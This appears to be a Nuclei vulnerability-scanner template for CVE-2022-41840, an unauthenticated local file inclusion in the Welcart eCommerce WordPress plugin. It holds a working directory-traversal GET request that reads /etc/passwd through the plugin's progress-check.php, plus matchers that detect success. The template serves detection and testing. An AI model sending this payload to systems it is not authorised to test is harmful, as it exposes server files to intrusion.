id: CVE-2022-41840 info: name: Welcart eCommerce <=2.7.7 - Local File Inclusion author: theamanrawat severity: critical description: | Welcart eCommerce 2.7.7 and before are vulnerable to unauthenticated local file inclusion. reference: - https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability - https://wordpress.org/plugins/usc-e-shop/ - https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability?_s_id=cve - https://nvd.nist.gov/vuln/detail/CVE-2022-41840 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-41840 cwe-id: CWE-22 metadata: verified: "true" tags: cve,cve2022,wp-plugin,wordpress,wp,lfi,unauth,usc-e-shop http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd" matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: word part: header words: - "application/json" - type: status status: - 200 # Enhanced by mp on 2023/01/15